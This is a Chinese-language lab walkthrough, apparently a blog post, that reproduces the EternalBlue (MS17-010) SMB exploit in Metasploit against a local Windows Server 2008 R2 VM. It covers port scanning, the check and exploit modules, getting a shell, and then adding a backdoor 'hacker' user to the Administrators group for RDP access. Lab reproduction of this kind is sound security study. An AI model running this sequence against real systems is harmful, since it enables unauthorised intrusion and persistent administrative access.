永恒之蓝漏洞复现

EternalBlue(在微软的MS17-010中被修复)是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。

准备工作

攻击机(kali)ip:192.168.174.130

靶机(windows server 2008 R2)ip:192.168.174.138

工具:kali自带的metasploit(msf)、nmap

利用ms17-010漏洞,靶机必须同时开启139和445端口

漏洞复现

获取ip地址

获取靶机ip地址

ipconfig

靶机ip地址为:192.168.174.138

image-20241231001456853

获取攻击机ip地址

ifconfig

攻击机ip地址为:192.168.174.130

这里windows7虚拟机和kali都为net模式,在同一C段

测试连接看能否ping通

ping 靶机ip

ping不同的情况大概率为Windows防火墙问题,要关闭Windows防火墙(不关闭防火墙nmap扫描不到其端口,MSF利用不了永恒之蓝漏洞)

端口扫描

Windows查看是否开启139和445端口

netstat -ano | findstr "139"
netstat -ano | findstr "445"

139和445端口都为listening状态,说明靶机开启了139和445端口

kali中nmap对靶机进行端口扫描

nmap 靶机ip

发现开启了139和445端口

kali使用msf进行端口扫描

msfconsole(启用msf)
use auxiliary/scanner/portscan/tcp(使用端口扫描模块)
set rhosts 靶机ip(设置扫描主机ip)
run(运行)

image-20241218235702724

发现开启了139和445端口

msf进行漏洞利用

msf搜索永恒之蓝漏洞

msfconsole
search ms17-010

image-20241219001631822

有五个可以利用的模块

模块3是一个检测是否存在ms17-010的模块,使用模块3对靶机进行漏洞检测,使用show options 查看参数

use 3
show options

显示主机需要设置,且这里为空,我们设置主机

image-20241231002557504

set rhosts 192.168.174.138

image-20241231002702775

run开始攻击

run

存在漏洞

image-20241231002744509

接下来使用模块0进行攻击

use 0
show options
set rhosts 192.168.174.138
run

攻击成功

image-20241231003248500

输入shell就可以获得靶机权限

image-20241231003320074

提权

创建一个用户,切记密码复杂度达到符合windows安全验证的密码。才可创建成功。

这里创建用户hacker,密码为A#123456

net user hacker A#123456 /add

image-20241231003711366

将创建好的用户拉进超级管理组

net localgroup Administrators hacker /add

image-20241231003810632

查看超级管理组中存在hacker

image-20241231003833212

后续使用本机远程桌面连接

在windows本机win+R 输入mstsc,启用远程连接目标靶机,连接我们创建的hacker用户即可